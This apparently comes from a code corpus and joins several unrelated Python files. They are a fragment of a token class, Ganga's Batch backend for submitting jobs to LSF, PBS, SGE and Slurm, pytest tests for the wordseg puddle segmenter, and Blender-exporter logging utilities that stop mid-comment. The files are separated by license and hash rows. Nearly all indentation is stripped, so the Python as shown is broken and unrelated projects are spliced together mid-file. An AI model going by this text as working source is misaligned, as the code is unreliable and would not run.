assert isinstance(namespace, str)
tags = tuple(tags.get(key) for key in cls._optional)
return tuple.__new__(cls, (txt, namespace, offset) + tags)
@staticmethod
def __make(txt, ns_off, tags):
"""Default constructor helper."""
try:
namespace = ns_off[0]
begin, end = ns_off[1]
offset = (int(begin), int(end))
except IndexError:
raise ValueError('namespace and/or offset undefined')
for idx, key in enumerate(token._optional):
if len(ns_off) > idx + 2:
tags[key] = ns_off[idx + 2]
else:
break
return txt, namespace, offset, tags
@staticmethod
def __copy(txt):
"""Copy constructor helper."""
tags = {}
txt = tuple(txt)
if len(txt) < 3 + len(token._optional):
raise ValueError('incorrect number of values: %i' % len(txt))
for idx, key in enumerate(token._optional):
if txt[idx + 3] is not None:
tags[key] = txt[idx + 3]
begin, end = tuple(txt[2])
off = (int(begin), int(end))
ns = txt[1]
txt = txt[0]
return txt, ns, off, tags
text = property(itemgetter(0), doc="the text object containing this token")
namespace = property(itemgetter(1), doc="the namespace of this token")
offset = property(itemgetter(2), doc="the (begin, end) offset in the text")
norm = property(optionable(itemgetter(3)), doc="the normalized token tag")
ortho = property(optionable(itemgetter(4)), doc="the orthographic descriptor tag")
pos = property(optionable(itemgetter(5)), doc="the part-of-speech tag")
chunk = property(optionable(itemgetter(6)), doc="the BIO phrase tag")
entity = property(optionable(itemgetter(7)), doc="the BIO NER tag")
ns = namespace
"""An alias for `namespace`."""
@property
def begin(self) -> int:
"""Return the begin index (inclusive) of the token."""
return self.offset[0]
@property
def end(self) -> int:
"""Return the end index (exclusive) of the token."""
return self.offset[1]
@property
def word(self) -> str:
"""Return the underlying token itself."""
return self.text[self.begin:self.end]
def __repr__(self) -> str:
return 'token(%s, %r%s)' % (
self.namespace, self.word,
''.join([
getattr(self, key).map(lambda val: ', %s=%r' % (key, val)).get_or('')
for key in self._optional
])
)
def __str__(self) -> str:
s = ['\\N' if i is None else str(i).replace('\t', '\\t') for i in self[1:]]
s[1] = '%i:%i' % self.offset
return '\t'.join(s)
def Update(self, **kwds):
"""Return a new `token` by replacing the specified fields."""
txt = kwds.get('text', self.text)
namespace = kwds.get('namespace', self.namespace)
offset = kwds.get('offset', self.offset)
for key in self._optional:
kwds[key] = kwds.get(key, getattr(self, key).get_or(None))
return token(txt, namespace, offset, **kwds)
@staticmethod
def _IsBegin(tag) -> bool:
return tag.map(methodcaller('startswith', 'B-')).get_or(False)
@staticmethod
def _IsInside(tag) -> bool:
return tag.map(methodcaller('startswith', 'I-')).get_or(False)
@staticmethod
def _IsOutside(tag) -> bool:
return tag.map(_ == 'O').get_or(False)
def PosIs(self, value) -> bool:
return self.pos.map(_ == value).get_or(value is None)
def PosStartswith(self, value) -> bool:
return self.pos.map(methodcaller('startswith', value)).get_or(False)
def ChunkIsOutside(self) -> bool:
return token._IsOutside(self.chunk)
def ChunkIsBegin(self) -> bool:
return token._IsBegin(self.chunk)
def ChunkIsInside(self) -> bool:
return token._IsInside(self.chunk)
def ChunkIs(self, value) -> bool:
return self.chunk.map(lambda c: c[2:] == value).get_or(False)
def EntityIsOutside(self) -> bool:
return token._IsOutside(self.entity)
def EntityIsBegin(self) -> bool:
return token._IsBegin(self.entity)
def EntityIsInside(self) -> bool:
return token._IsInside(self.entity)
def EntityIs(self, value) -> bool:
return self.entity.map(lambda e: e[2:] == value).get_or(False)
| agpl-3.0 | -8,545,638,999,496,082,000 | 33.921466 | 97 | 0.594753 | false |
ganga-devs/ganga | ganga/GangaCore/Lib/Batch/Batch.py | 1 | 24988 | import datetime
import time
import os
import re
import os.path
import GangaCore.Utility.logging
import GangaCore.Utility.Config
import GangaCore.Utility.Virtualization
from GangaCore.GPIDev.Adapters.IBackend import IBackend
from GangaCore.GPIDev.Base.Proxy import isType, getName, stripProxy
from GangaCore.GPIDev.Schema import Schema, Version, SimpleItem
from GangaCore.Core.exceptions import BackendError
logger = GangaCore.Utility.logging.getLogger()
# A trivial implementation of a shell command with stderr/stdout capture.
# This is a self-contained function (with logging).
#
# return (exitcode,soutfile,exeflag)
# soutfile - path where the stdout/stderr is stored
# exeflag - 0 if the command failed to execute, 1 if it executed
def shell_cmd(cmd, soutfile=None, allowed_exit=[0]):
if not soutfile:
import tempfile
soutfile = tempfile.mktemp()
    # FIXME: grabbing stdout is done by shell magic and probably should be
    # implemented in python directly
cmd = "%s > %s 2>&1" % (cmd, soutfile)
logger.debug("running shell command: %s", cmd)
rc = os.system(cmd)
if not rc in allowed_exit:
logger.debug('exit status [%d] of command %s', rc, cmd)
logger.debug('full output is in file: %s', soutfile)
with open(soutfile) as sout_file:
logger.debug('<first 255 bytes of output>\n%s', sout_file.read(255))
logger.debug('<end of first 255 bytes of output>')
m = None
if rc != 0:
logger.debug('non-zero [%d] exit status of command %s ', rc, cmd)
with open(soutfile) as sout_file:
m = re.compile(r"command not found$", re.M).search(sout_file.read())
return rc, soutfile, m is None
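# Illustrative example (not part of the original module):
#
#   rc, out, executed = shell_cmd('bjobs -u $USER')
#   # rc       -> exit status of the shell command
#   # out      -> path of the file capturing stdout/stderr
#   # executed -> False only if the shell reported "command not found"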
class Batch(IBackend):
""" Batch submission backend.
    It is assumed that Batch commands (bjobs, bsub etc.) are set up
    correctly. As few assumptions as possible are made about the
    Batch configuration, but at certain sites it may not work correctly
    due to a different Batch setup. Tested with CERN and CNAF Batch
    installations.
Each batch system supports an 'extraopts' field, which allows customisation
of way the job is submitted.
PBS:
Take environment settings on submitting machine and export to batch job:
backend.extraopts = "-V"
Request minimum walltime of 24 hours and minimum memory of 2GByte:
backend.extraopts = "-l walltime=24:00:00 mem=2gb"
The above can be combined as:
backend.extraopts = "-V -l walltime=24:00:00 mem=2gb"
LSF:
Sends mail to you when the job is dispatched and begins execution.
backend.extraopts = "-B"
Assigns the Ganga job name to the batch job. The job name does not need to
be unique.
backend.extraopts = "-J "+ j.name
Run the job on a host that meets the specified resource requirements.
A resource requirement string describes the resources a job needs.
E.g request 2Gb of memory ans 1Gb of swap space
backend.extraopts = '-R "mem=2048" -R "swp=1024"'
Kill job if it has exceeded the deadline (i.e. for your presentation)
backend.extraopts = '-t 07:14:12:59' #Killed if not finished by 14 July before 1 pm
"""
    _schema = Schema(Version(1, 0), {'queue': SimpleItem(defvalue='', doc='queue name as defined in your local Batch installation'),
'extraopts': SimpleItem(defvalue='', changable_at_resubmit=1, doc='extra options for Batch. See help(Batch) for more details'),
'id': SimpleItem(defvalue='', protected=1, copyable=0, doc='Batch id of the job'),
'exitcode': SimpleItem(defvalue=None, typelist=[int, None], protected=1, copyable=0, doc='Process exit code'),
'status': SimpleItem(defvalue='', protected=1, hidden=1, copyable=0, doc='Batch status of the job'),
'actualqueue': SimpleItem(defvalue='', protected=1, copyable=0, doc='queue name where the job was submitted.'),
'actualCE': SimpleItem(defvalue='', protected=1, copyable=0, doc='hostname where the job is/was running.')
})
_category = 'backends'
_name = 'Batch'
_hidden = 1
def __init__(self):
super(Batch, self).__init__()
def command(klass, cmd, soutfile=None, allowed_exit=None):
if allowed_exit is None:
allowed_exit = [0]
rc, soutfile, ef = shell_cmd(cmd, soutfile, allowed_exit)
        if not ef:
            logger.error(
                'Problem submitting batch job. Maybe your chosen batch system is not available or you have configured it wrongly')
            with open(soutfile) as sout_file:
                output = sout_file.read()
            logger.error(output)
            # the command could not be executed at all: report it as a backend error
            raise BackendError(klass._name, 'It seems that %s commands are not installed properly: %s' % (klass._name, output))
        return rc, soutfile
command = classmethod(command)
def _getLegalJobName(self, job):
tmp_name = job.name
# if jobnamesubstitution is set and not empty, then transform the job
# name to conform to requirements
if 'jobnamesubstitution' in self.config:
job_name_sub_cfg = self.config['jobnamesubstitution']
if len(job_name_sub_cfg) == 2:
tmp_name = re.sub(*job_name_sub_cfg, tmp_name)
elif not len(job_name_sub_cfg) == 0:
# list is not empty, and not of length 2
logger.warning("jobnamesubstitution should be a list of length 2. Skipping job name substitution.")
return tmp_name
def submit(self, jobconfig, master_input_sandbox):
global re
job = self.getJobObject()
inw = job.getInputWorkspace()
outw = job.getOutputWorkspace()
#scriptpath = self.preparejob(jobconfig,inw,outw)
scriptpath = self.preparejob(jobconfig, master_input_sandbox)
# FIX from Angelo Carbone
# stderr_option = '-e '+str(outw.getPath())+'stderr'
# stdout_option = '-o '+str(outw.getPath())+'stdout'
# FIX from Alex Richards - see Savannah #87477
stdout_option = self.config['stdoutConfig'] % str(outw.getPath())
stderr_option = self.config['stderrConfig'] % str(outw.getPath())
queue_option = ''
if self.queue:
if isType(self, Slurm):
queue_option = '-p ' + str(self.queue)
else:
queue_option = '-q ' + str(self.queue)
try:
jobnameopt = "-" + self.config['jobnameopt']
except Exception as err:
logger.debug("Unknown error: %s" % str(err))
jobnameopt = False
if self.extraopts:
for opt in re.compile(r'(-\w+)').findall(self.extraopts):
if opt in ('-o', '-e', '-oo', '-eo'):
logger.warning("option %s is forbidden", opt)
return False
if self.queue:
if isType(self, Slurm):
if opt == '-p':
logger.warning("option %s is forbidden if partition is defined ( partition = '%s')", opt, self.queue)
return False
elif opt == '-q':
logger.warning("option %s is forbidden if queue is defined ( queue = '%s')", opt, self.queue)
return False
if jobnameopt and opt == jobnameopt:
jobnameopt = False
queue_option = queue_option + " " + self.extraopts
if jobnameopt and job.name != '':
tmp_name = self._getLegalJobName(job)
queue_option = queue_option + " " + \
jobnameopt + " " + "'%s'" % (tmp_name)
# bugfix #16646
if self.config['shared_python_executable']:
import sys
script_cmd = "%s %s" % (sys.executable, scriptpath)
else:
script_cmd = scriptpath
command_str = self.config['submit_str'] % (inw.getPath(), queue_option, stderr_option, stdout_option, script_cmd)
self.command_string = command_str
rc, soutfile = self.command(command_str)
with open(soutfile) as sout_file:
sout = sout_file.read()
m = re.compile(self.config['submit_res_pattern'], re.M).search(sout)
if m is None:
logger.warning('could not match the output and extract the Batch job identifier!')
logger.warning('command output \n %s ', sout)
else:
self.id = m.group('id')
try:
queue = m.group('queue')
if self.queue != queue:
if self.queue:
logger.warning('you requested queue "%s" but the job was submitted to queue "%s"', self.queue, queue)
logger.warning('command output \n %s ', sout)
else:
logger.info('using default queue "%s"', queue)
self.actualqueue = queue
except IndexError:
logger.info('could not match the output and extract the Batch queue name')
# clean up the tmp file
if os.path.exists(soutfile):
os.remove(soutfile)
return rc == 0
def resubmit(self):
global re
job = self.getJobObject()
inw = job.getInputWorkspace()
outw = job.getOutputWorkspace()
statusfilename = outw.getPath('__jobstatus__')
try:
os.remove(statusfilename)
except OSError as x:
if x.errno != 2:
logger.warning("OSError:" + str(x))
scriptpath = inw.getPath('__jobscript__')
#stderr_option = '-e '+str(outw.getPath())+'stderr'
#stdout_option = '-o '+str(outw.getPath())+'stdout'
# FIX from Alex Richards - see Savannah #87477
stdout_option = self.config['stdoutConfig'] % str(outw.getPath())
stderr_option = self.config['stderrConfig'] % str(outw.getPath())
queue_option = ''
if self.queue:
if isType(self, Slurm):
queue_option = '-p ' + str(self.queue)
else:
queue_option = '-q ' + str(self.queue)
try:
jobnameopt = "-" + self.config['jobnameopt']
except Exception as err:
logger.debug("Err: %s" % str(err))
jobnameopt = False
if self.extraopts:
for opt in re.compile(r'(-\w+)').findall(self.extraopts):
if opt in ('-o', '-e', '-oo', '-eo'):
logger.warning("option %s is forbidden", opt)
return False
if self.queue:
if isType(self, Slurm):
if opt == '-p':
logger.warning("option %s is forbidden if partition is defined ( partition = '%s')", opt, self.queue)
return False
elif opt == '-q':
logger.warning("option %s is forbidden if queue is defined ( queue = '%s')", opt, self.queue)
return False
if jobnameopt and opt == jobnameopt:
jobnameopt = False
queue_option = queue_option + " " + self.extraopts
if jobnameopt and job.name != '':
# PBS doesn't like names with spaces
tmp_name = self._getLegalJobName(job)
queue_option = queue_option + " " + \
jobnameopt + " " + "'%s'" % (tmp_name)
# bugfix #16646
if self.config['shared_python_executable']:
import sys
script_cmd = "%s %s" % (sys.executable, scriptpath)
else:
script_cmd = scriptpath
command_str = self.config['submit_str'] % (
inw.getPath(), queue_option, stderr_option, stdout_option, script_cmd)
self.command_string = command_str
rc, soutfile = self.command(command_str)
logger.debug('from command get rc: "%d"', rc)
if rc == 0:
with open(soutfile) as sout_file:
sout = sout_file.read()
m = re.compile(
self.config['submit_res_pattern'], re.M).search(sout)
if m is None:
logger.warning('could not match the output and extract the Batch job identifier!')
logger.warning('command output \n %s ', sout)
else:
self.id = m.group('id')
try:
queue = m.group('queue')
if self.queue != queue:
if self.queue:
logger.warning('you requested queue "%s" but the job was submitted to queue "%s"', self.queue, queue)
logger.warning('command output \n %s ', sout)
else:
logger.info('using default queue "%s"', queue)
self.actualqueue = queue
except IndexError:
logger.info('could not match the output and extract the Batch queue name')
else:
with open(soutfile) as sout_file:
logger.warning(sout_file.read())
# clean up the tmp file
if os.path.exists(soutfile):
os.remove(soutfile)
return rc == 0
def kill(self):
rc, soutfile = self.command(self.config['kill_str'] % (self.id))
with open(soutfile) as sout_file:
sout = sout_file.read()
# clean up the tmp file
if os.path.exists(soutfile):
os.remove(soutfile)
logger.debug('while killing job %s: rc = %d', self.getJobObject().getFQID('.'), rc)
if rc == 0:
return True
else:
global re
m = re.compile(self.config['kill_res_pattern'], re.M).search(sout)
logger.warning('while killing job %s: %s', self.getJobObject().getFQID('.'), sout)
return m is not None
def getStateTime(self, status):
"""Obtains the timestamps for the 'running', 'completed', and 'failed' states.
The __jobstatus__ file in the job's output directory is read to obtain the start and stop times of the job.
These are converted into datetime objects and returned to the user.
"""
j = self.getJobObject()
end_list = ['completed', 'failed']
d = {}
checkstr = ''
if status == 'running':
checkstr = 'START:'
elif status == 'completed':
checkstr = 'STOP:'
elif status == 'failed':
checkstr = 'FAILED:'
else:
checkstr = ''
if checkstr == '':
logger.debug("In getStateTime(): checkstr == ''")
return None
try:
p = os.path.join(j.outputdir, '__jobstatus__')
logger.debug("Opening output file at: %s", p)
f = open(p)
except IOError:
logger.debug('unable to open file %s', p)
return None
        # iterate inside a with-block so the file is closed on every exit
        # path, including the early returns below
        with f:
            for l in f:
                if checkstr in l:
                    pos = l.find(checkstr)
                    timestr = l[pos + len(checkstr) + 1:pos + len(checkstr) + 25]
                    try:
                        t = datetime.datetime(
                            *(time.strptime(timestr, "%a %b %d %H:%M:%S %Y")[0:6]))
                    except ValueError:
                        logger.debug("Value Error in file: '%s': string does not match required format.", p)
                        return None
                    return t
logger.debug("Reached the end of getStateTime('%s'). Returning None.", status)
return None
def timedetails(self):
"""Return all available timestamps from this backend.
"""
j = self.getJobObject()
# check for file. if it's not there don't bother calling getSateTime
# (twice!)
p = os.path.join(j.outputdir, '__jobstatus__')
if not os.path.isfile(p):
logger.error('unable to open file %s', p)
return None
r = self.getStateTime('running')
c = self.getStateTime('completed')
d = {'START': r, 'STOP': c}
return d
def preparejob(self, jobconfig, master_input_sandbox):
job = self.getJobObject()
mon = job.getMonitoringService()
import GangaCore.Core.Sandbox as Sandbox
from GangaCore.GPIDev.Lib.File import File
from GangaCore.Core.Sandbox.WNSandbox import PYTHON_DIR
import inspect
virtualization = job.virtualization
utilFiles= []
fileutils = File( inspect.getsourcefile(GangaCore.Utility.files), subdir=PYTHON_DIR )
utilFiles.append(fileutils)
if virtualization:
virtualizationutils = File( inspect.getsourcefile(GangaCore.Utility.Virtualization), subdir=PYTHON_DIR )
utilFiles.append(virtualizationutils)
sharedfiles = jobconfig.getSharedFiles()
subjob_input_sandbox = job.createPackedInputSandbox(jobconfig.getSandboxFiles() + utilFiles )
appscriptpath = [jobconfig.getExeString()] + jobconfig.getArgStrings()
sharedoutputpath = job.getOutputWorkspace().getPath()
## FIXME Check this isn't a GangaList
outputpatterns = jobconfig.outputbox
environment = jobconfig.env if not jobconfig.env is None else {}
import inspect
script_location = os.path.join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
'BatchScriptTemplate.py.template')
from GangaCore.GPIDev.Lib.File import FileUtils
text = FileUtils.loadScript(script_location, '')
if virtualization:
text = virtualization.modify_script(text)
import GangaCore.Core.Sandbox as Sandbox
import GangaCore.Utility as Utility
from GangaCore.Utility.Config import getConfig
from GangaCore.GPIDev.Lib.File.OutputFileManager import getWNCodeForOutputSandbox, getWNCodeForOutputPostprocessing, getWNCodeForDownloadingInputFiles, getWNCodeForInputdataListCreation
jobidRepr = repr(self.getJobObject().getFQID('.'))
replace_dict = {
'###OUTPUTSANDBOXPOSTPROCESSING###' : getWNCodeForOutputSandbox(job, ['__syslog__'], jobidRepr),
'###OUTPUTUPLOADSPOSTPROCESSING###' : getWNCodeForOutputPostprocessing(job, ''),
'###DOWNLOADINPUTFILES###' : getWNCodeForDownloadingInputFiles(job, ''),
'###INLINEMODULES###' : inspect.getsource(Sandbox.WNSandbox),
'###INLINEHOSTNAMEFUNCTION###' : inspect.getsource(Utility.util.hostname),
'###APPSCRIPTPATH###' : repr(appscriptpath),
#'###SHAREDINPUTPATH###' : repr(sharedinputpath)),
'###INPUT_SANDBOX###' : repr(subjob_input_sandbox + master_input_sandbox + sharedfiles),
'###CREATEINPUTDATALIST###' : getWNCodeForInputdataListCreation(job, ''),
'###SHAREDOUTPUTPATH###' : repr(sharedoutputpath),
'###OUTPUTPATTERNS###' : repr(outputpatterns),
'###JOBID###' : jobidRepr,
'###ENVIRONMENT###' : repr(environment),
'###PREEXECUTE###' : self.config['preexecute'],
'###POSTEXECUTE###' : self.config['postexecute'],
'###JOBIDNAME###' : self.config['jobid_name'],
'###QUEUENAME###' : self.config['queue_name'],
'###HEARTBEATFREQUENCE###' : self.config['heartbeat_frequency'],
'###INPUT_DIR###' : repr(job.getStringInputDir()),
'###GANGADIR###' : repr(getConfig('System')['GANGA_PYTHONPATH'])
}
for k, v in replace_dict.items():
text = text.replace(str(k), str(v))
logger.debug('subjob input sandbox %s ', subjob_input_sandbox)
logger.debug('master input sandbox %s ', master_input_sandbox)
from GangaCore.GPIDev.Lib.File import FileBuffer
return job.getInputWorkspace().writefile(FileBuffer('__jobscript__', text), executable=1)
@staticmethod
def updateMonitoringInformation(jobs):
global re
repid = re.compile(r'^PID: (?P<pid>\d+)', re.M)
requeue = re.compile(r'^QUEUE: (?P<queue>\S+)', re.M)
reactualCE = re.compile(r'^ACTUALCE: (?P<actualCE>\S+)', re.M)
reexit = re.compile(r'^EXITCODE: (?P<exitcode>\d+)', re.M)
def get_last_alive(f):
"""Time since the statusfile was last touched in seconds"""
import os.path
import time
talive = 0
try:
talive = time.time() - os.path.getmtime(f)
except OSError as x:
logger.debug('Problem reading status file: %s (%s)', f, str(x))
return talive
def get_status(f):
"""Give (pid,queue,actualCE,exit code) for job"""
pid, queue, actualCE, exitcode = None, None, None, None
global re
statusfile = None
try:
statusfile = open(f)
stat = statusfile.read()
except IOError as x:
logger.debug('Problem reading status file: %s (%s)', f, str(x))
return pid, queue, actualCE, exitcode
finally:
if statusfile:
statusfile.close()
mpid = repid.search(stat)
if mpid:
pid = int(mpid.group('pid'))
mqueue = requeue.search(stat)
if mqueue:
queue = str(mqueue.group('queue'))
mactualCE = reactualCE.search(stat)
if mactualCE:
actualCE = str(mactualCE.group('actualCE'))
mexit = reexit.search(stat)
if mexit:
exitcode = int(mexit.group('exitcode'))
return pid, queue, actualCE, exitcode
from GangaCore.Utility.Config import getConfig
for j in jobs:
stripProxy(j)._getSessionLock()
outw = j.getOutputWorkspace()
statusfile = os.path.join(outw.getPath(), '__jobstatus__')
heartbeatfile = os.path.join(outw.getPath(), '__heartbeat__')
pid, queue, actualCE, exitcode = get_status(statusfile)
if j.status == 'submitted':
if pid or queue:
j.updateStatus('running')
if pid:
j.backend.id = pid
if queue and queue != j.backend.actualqueue:
j.backend.actualqueue = queue
if actualCE:
j.backend.actualCE = actualCE
if j.status == 'running':
if exitcode is not None:
# Job has finished
j.backend.exitcode = exitcode
if exitcode == 0:
j.updateStatus('completed')
else:
j.updateStatus('failed')
else:
# Job is still running. Check if alive
time = get_last_alive(heartbeatfile)
config = getConfig(getName(j.backend))
if time > config['timeout']:
logger.warning(
'Job %s has disappeared from the batch system.', str(j.getFQID('.')))
j.updateStatus('failed')
#_________________________________________________________________________
class LSF(Batch):
''' LSF backend - submit jobs to Load Sharing Facility.'''
_schema = Batch._schema.inherit_copy()
_category = 'backends'
_name = 'LSF'
config = GangaCore.Utility.Config.getConfig('LSF')
def __init__(self):
super(LSF, self).__init__()
#_________________________________________________________________________
class PBS(Batch):
''' PBS backend - submit jobs to Portable Batch System.
'''
_schema = Batch._schema.inherit_copy()
_category = 'backends'
_name = 'PBS'
config = GangaCore.Utility.Config.getConfig('PBS')
def __init__(self):
super(PBS, self).__init__()
#_________________________________________________________________________
class SGE(Batch):
''' SGE backend - submit jobs to Sun Grid Engine.
'''
_schema = Batch._schema.inherit_copy()
_category = 'backends'
_name = 'SGE'
config = GangaCore.Utility.Config.getConfig('SGE')
def __init__(self):
super(SGE, self).__init__()
#_________________________________________________________________________
class Slurm(Batch):
''' Slurm backend - submit jobs to Slurm.
'''
_schema = Batch._schema.inherit_copy()
_category = 'backends'
_name = 'Slurm'
config = GangaCore.Utility.Config.getConfig('Slurm')
def __init__(self):
super(Slurm, self).__init__()
| gpl-2.0 | 5,901,647,742,991,185,000 | 37.384025 | 193 | 0.553506 | false |
bootphon/wordseg | test/test_algo_puddle.py | 1 | 3074 | """Test of the wordseg.algos.puddle module"""
import codecs
import copy
import os
import pytest
from wordseg.separator import Separator
from wordseg.prepare import gold, prepare
from wordseg.evaluate import evaluate
from wordseg.algos import puddle
@pytest.mark.parametrize(
'window, nfolds, njobs, by_frequency',
[(w, f, j, b)
for w in (1, 3) for f in (1, 3) for j in (3, 5) for b in (True, False)])
def test_puddle(prep, window, nfolds, njobs, by_frequency):
out = list(puddle.segment(
prep, window=window, by_frequency=by_frequency,
nfolds=nfolds, njobs=njobs))
s = Separator().remove
assert len(out) == len(prep)
for n, (a, b) in enumerate(zip(out, prep)):
assert s(a) == s(b), 'line {}: "{}" != "{}"'.format(n+1, s(a), s(b))
def test_empty_line(prep):
with pytest.raises(ValueError) as err:
puddle.segment(prep[:2] + [''] + prep[4:])
assert 'utterance is empty' in str(err)
def test_replicate(datadir):
sep = Separator()
_tags = [utt for utt in codecs.open(
os.path.join(datadir, 'tagged.txt'), 'r', encoding='utf8')
if utt][:100] # 100 first lines only
_prepared = prepare(_tags, separator=sep)
_gold = gold(_tags, separator=sep)
segmented = puddle.segment(_prepared, nfolds=1)
score = evaluate(segmented, _gold)
# we obtained that score from the dibs version in CDSWordSeg
# (using wordseg.prepare and wordseg.evaluate in both cases)
expected = {
'type_fscore': 0.06369,
'type_precision': 0.1075,
'type_recall': 0.04525,
'token_fscore': 0.06295,
'token_precision': 0.2056,
'token_recall': 0.03716,
'boundary_all_fscore': 0.4605,
'boundary_all_precision': 1.0,
'boundary_all_recall': 0.2991,
'boundary_noedge_fscore': 0.02806,
'boundary_noedge_precision': 1.0,
'boundary_noedge_recall': 0.01423}
assert score == pytest.approx(expected, rel=1e-3)
def test_train_text(prep):
train_text = prep[:10]
test_text = prep[10:]
# offline learning on train_text
segmented1 = list(puddle.segment(test_text, train_text=train_text))
# online learning
segmented2 = list(puddle.segment(test_text, nfolds=1))
def join(s):
return ''.join(s).replace(' ', '')
assert len(test_text) == len(segmented1) == len(segmented2)
assert join(test_text) == join(segmented1) == join(segmented2)
def test_segment_only(prep):
train_text = prep[:10]
test_text = prep[10:]
# train a model on train_text
model = puddle.Puddle()
model.train(train_text)
model_backup = copy.deepcopy(model)
# ensure the model is not updated during segmentation
segmented = list(model.segment(test_text, update_model=False))
assert len(segmented) == len(test_text)
assert model == model_backup
# ensure the model is updated during segmentation
segmented = list(model.segment(test_text, update_model=True))
assert len(segmented) == len(test_text)
assert model != model_backup
| gpl-3.0 | 2,863,014,731,301,385,000 | 29.74 | 77 | 0.639232 | false |
WorldSEnder/MCAnm | scripts/io_export_mhfc/utils.py | 1 | 11769 | # Logging: easier workflow with some utility methods to log and handle errors
from collections import defaultdict, namedtuple
from enum import Enum
import bpy
import os
import sys
import traceback
class LogLevel(Enum):
DEBUG = 'debug'
INFO = 'info'
WARNING = 'warning'
ERROR = 'error'
FATAL = 'fatal'
def is_fatal(self):
return self == LogLevel.ERROR or self == LogLevel.FATAL
def get_bl_report_level(self):
if self == LogLevel.DEBUG:
return {'DEBUG'}
if self == LogLevel.INFO:
return {'INFO'}
if self == LogLevel.WARNING:
return {'WARNING'}
if self == LogLevel.ERROR:
return {'ERROR_INVALID_INPUT'}
if self == LogLevel.FATAL:
return {'ERROR'}
ReportItem = namedtuple('ReportItem', 'message etype value traceback')
class Report(object):
_reports = None
def __init__(self):
self._reports = defaultdict(list)
def extend(self, other):
"""Append another report to this one
"""
for level in other._reports:
self._reports[level].extend(other._reports[level])
def append(self, message, level=LogLevel.INFO, cause=None):
if cause is None:
cause = sys.exc_info()
etype, val, trace = cause
self._reports[level].append(ReportItem(message, etype, val, trace))
return self
def get_items(self, level):
return self._reports[level]
def contains_fatal(self):
for level in self._reports:
if level.is_fatal() and self._reports[level]:
return True
return False
def print_report(self, op):
for level in self._reports:
op_level = level.get_bl_report_level()
for item in self.get_items(level):
op.report(op_level, str(item.message))
if level.is_fatal():
formatted = traceback.format_exception(
item.etype, item.value, item.traceback)
op.report(op_level, ''.join(formatted))
class ReportedError(RuntimeError):
"""Thrown when a Reporter fails to run. That is an error or a fatal exception occured during
running it.
"""
report = None
_target = None
def __init__(self, message, target=None):
super(ReportedError, self).__init__(message)
self.report = Report()
self._target = target
def is_aimed_at(self, candidate):
return self._target is None or self._target is candidate
@classmethod
def throw_from_exception(cls, reporter, level=LogLevel.ERROR, exc=None):
"""Constructs a ReportedError from the current exception handling context.
"""
if exc is None:
exc = sys.exc_info()
_, exc_value, _ = exc
message = "An error occured: " + str(exc_value)
reported = cls(message, target=reporter)
reported.report.append(message, level=level, cause=exc)
raise reported from exc_value
def static_access(func):
"""Provides static access to member functions by calling the function with self set to None
"""
import functools
class Functor(object):
def __get__(self, instance, owner):
# DON'T CHECK FOR instance is None, unlike functions, which then
# return themselves
return functools.partial(func, instance)
return Functor()
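# Illustrative sketch (hypothetical class; not part of the original module):
# a method decorated with static_access can be called on an instance or on
# the class itself, in which case `self` is bound to None.
#
#   class Log(object):
#       @static_access
#       def emit(self, message):
#           target = self if self is not None else '<default>'
#           print(target, message)
#
#   Log().emit('bound call')   # self is the Log instance
#   Log.emit('static call')    # self is None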
class Reporter(object):
"""Via this class one can make reports of a process. That is return warnings, errors and
fatal exceptions
"""
_stack = []
_report = None
_caught = None
_engaged = None
_bl_op = None
def __init__(self, caught_types=(Exception,), reported_to=None):
"""@param caught_types: A repeatable-iterable containing classinfos that will be used to check if an exception of type exc_t
should be caught or not. A caught exception will be logged as LogLevel.ERROR and not passed onwards. Note that
each entry of caught_types can be either a class or a tuple of classes and will be checked via issubclass(exc_t, entry).
Note that this does not change how an ReportedError is handled. They are reported if they
belong to this reporter.
"""
self._report = Report()
self._caught = caught_types
self._engaged = False
self._bl_op = reported_to
# The following will check that the given caught_types is indeed legal
# by performing a dummy check
self._should_catch(type(None))
def _should_catch(self, exc_type):
return any(issubclass(exc_type, ct) for ct in self._caught)
def __enter__(self):
if self._engaged:
raise RuntimeError("No multi-entry into a reporter allowed")
self._engaged = True
Reporter._stack.append(self)
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
exc = (exc_type, exc_value, traceback)
if exc_value is None:
# Completed normally, yay
return False
if isinstance(exc_value, ReportedError):
# Allows for nesting of multiple reporters
if exc_value.is_aimed_at(self):
self._report.extend(exc_value.report)
return True # Catch it, was ours
else:
exc_value.report.extend(self._report)
return False # Pass it on, to another reporter
if self._should_catch(exc_type):
self._report.append(exc_value, level=LogLevel.ERROR, cause=exc)
return True
return False
finally:
self._engaged = False
if self._bl_op is not None:
self.print_report(self._bl_op)
assert(Reporter._stack.pop() is self)
def rebind_bl_op(self, op):
"""Binds a Blender op that will be reported to when this Reporter __exit__s
"""
self._bl_op = op
@classmethod
def _get_reporter(cls, proposed):
if proposed is not None:
return proposed
if not cls._stack:
return None
return cls._stack[-1]
@static_access
def warning(self, message, *args, **wargs):
"""When something happened that can be recovered from but isn't
conformant never-the-less
"""
self = Reporter._get_reporter(self)
if self is None:
return
formatted = message.format(*args, **wargs)
self._report.append(formatted, level=LogLevel.WARNING)
@static_access
def info(self, message, *args, **wargs):
"""A useful information for the user
"""
self = Reporter._get_reporter(self)
if self is None:
return
formatted = message.format(*args, **wargs)
self._report.append(formatted, level=LogLevel.INFO)
@static_access
def debug(self, message, *args, **wargs):
"""Debug output, only output during debug mode
"""
self = Reporter._get_reporter(self)
if self is None:
return
formatted = message.format(*args, **wargs)
self._report.append(formatted, level=LogLevel.DEBUG)
@static_access
def error(self, message, *args, cause=None, **wargs):
"""When something happened that can't conform with the specification.
Aka: the user's fault
"""
if self is not None and not self._engaged:
raise RuntimeError(
"Can't file an error without __enter__'ing this Reporter")
formatted = message.format(*args, **wargs)
try:
raise RuntimeError(formatted) from cause
except RuntimeError:
ReportedError.throw_from_exception(self, level=LogLevel.FATAL)
@static_access
def fatal(self, message, *args, cause=None, **wargs):
"""
When something happened that really shouldn't happen.
Aka: my fault
"""
if self is not None and not self._engaged:
raise RuntimeError(
"Can't file an error without __enter__'ing this Reporter")
formatted = message.format(*args, **wargs)
message = "This should not have happened. Report to WorldSEnder:\n{mess}".format(
mess=formatted)
try:
raise RuntimeError(message) from cause
except RuntimeError:
ReportedError.throw_from_exception(self, level=LogLevel.FATAL)
def print_report(self, op):
self._report.print_report(op)
def was_success(self):
return not self._report.contains_fatal()
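# Illustrative usage sketch (names are hypothetical; not part of this module):
# Reporter is used as a context manager and collects everything filed while it
# is active; errors abort the block via ReportedError and end up in the report.
#
#   with Reporter(reported_to=operator) as reporter:
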